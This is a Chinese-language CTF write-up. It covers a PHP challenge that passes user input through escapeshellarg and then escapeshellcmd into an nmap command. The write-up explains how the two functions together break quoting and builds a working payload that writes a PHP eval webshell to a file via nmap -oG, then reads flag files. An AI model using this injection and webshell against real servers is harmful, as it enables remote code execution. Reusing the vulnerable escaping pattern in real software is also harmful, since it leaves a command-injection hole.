<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox); //创建沙盒
chdir($sandbox); //将当前目录名改为$sandbox
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
$_SERVER
是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。
在PHP 中用$_SERVER['REMOTE_ADDR']
取得客户端的 IP地址,但如果客户端是使用代理服务器来访问,那取到的就是代理服务器的 IP 地址,而不是真正的客户端 IP 地址。要想透过代理服务器取得客户端的真实 IP 地址,就要使用$_SERVER['HTTP_X_FORWARDED_FOR']
来读取。
如果客户端没有通过代理服务器来访问,那么用$_SERVER[“HTTP_X_FORWARDED_FOR”]
取到的值将是空的
这里的$_SERVER
对题目没有影响,可以忽略
可以看到用到执行了有关nmap的命令,其中有一个写文件的参数
namp -oG
nmap xxx -oG 1.txt 就可以将xxx写入1.txt
nmap <?php eval($_POST[1]);?> 1.php
可以将一句话木马写入1.php中了,因此这就是我们的思路
escapeshellargs()
函数说明:把字符串转码为可以在 shell 命令里使用的参数
形式:string escapeshellarg ( string $arg )
将给字符串增加一个单引号,并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)
<?php
echo escapeshellarg("DMIND")."\n";
echo escapeshellarg("DMIND;dmind")."\n";
echo escapeshellarg("DMIND'dmind")."\n";
echo escapeshellarg("'DMIND '");
?>
输出:
'DMIND' //给字符串增加单引号
'DMIND;dmind' //只当作一个参数
'DMIND'\''dmind' //对已经存在的单引号进行转义。 '转化为'\''
''\''DMIND '\''' // '转化为'\''
可以看出escashellargs()针对了单引号
escapeshellcmd()
函数说明:shell 元字符转义
形式:escapeshellcmd ( string $command ) : string
对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义
反斜线(\)会在以下字符之前插入:
& # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ , \x0A 和 \xFF
'
和"
仅在不配对的时候被转义
<?php
echo escapeshellcmd("DMIND"))."\n";
echo escapeshellcmd("DMIND;dmind")."\n";
echo escapeshellcmd("DMIND'dmind")."\n";
echo escapeshellcmd("'DMIND '");
?>
输出:
DMIND
DMIND\;dmind //特殊字符会加上转义符: \
DMIND\'dmind //不配对的单引号加上转义符:\
'DMIND ' //配对的则不会加
这两个函数单独使用没有问题,但当先使用escapeshellargs()
再将值传给escapeshellcmd()
时就会发生问题
<?php
$a=escapeshellarg("127.0.0.1' -v -d a=1");
echo $a."\n";
echo escapeshellcmd($a)."\n";
?>
输出:
'127.0.0.1'\'' -v -d a=1'
'127.0.0.1'\\'' -v -d a=1\'
如果前面拼接一个curl,那就会变成:
curl 127.0.0.1\ -v -d a=1\'
需要注意:引号能闭合的就闭合,\\
会被当作\
,而'\\'
就被当作\\
利用escapeshellcmd()
和escapeshellarg()
处理引号方式的差别,就可以构造语句导致引号之间闭合,从而使本来当作字符的字符串成为了能执行命令的语句
这题,假如我们构造
' <?php eval($_POST[1]);?> -oG 3.php '
经过两个函数的处理后变为''\\'' \<\?php eval\(\$_POST\[1\]\)\;\?\> -oG 3.php '\\'''
将该闭合的引号闭合上,忽略这些闭合的引号就变为了:
\ <?php eval($_POST[1]);?> -oG 3.php \\
拼接上题目的语句
nmap -T5 -sT -Pn --host-timeout 2 -F \ <?php eval($_POST[1]);?> -oG 3.php \\
最后访问页面返回的沙盒目录名与文件名,执行system("tac /f*");
即可